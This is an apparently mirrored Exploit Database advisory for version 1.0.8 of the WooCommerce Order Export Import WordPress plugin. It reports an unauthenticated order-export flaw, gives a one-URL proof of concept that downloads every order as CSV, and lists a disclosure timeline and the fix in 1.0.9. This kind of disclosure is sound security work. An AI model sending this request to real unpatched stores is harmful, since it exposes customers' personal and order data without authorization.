WordPress Plugin Order Export Import for WooCommerce – Order Information Disclosure

• Exploit Database
• 14 阅读

• 作者： david-peltier
  日期： 2016-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40391/

• # Exploit Title: WordPress Plugin Order Export Import for WooCommerce
  # Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
  # Version: 1.0.8
  # Date: 19th 2016
  # Exploit Author: contact ([a]) david-peltier ([d]) fr
  # Vendor Homepage: xadapter.com
  # Version: 1.0.8
  # Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016
  
  
  ### SUMMARY
  
  WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
  This attacks allows an attacker to export all order without being authenticated
  
  ### POC
  
  http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
  A .CSV with all orders will be downloaded
  
  ### FIX
  
  The vendor fix this issue in 1.0.9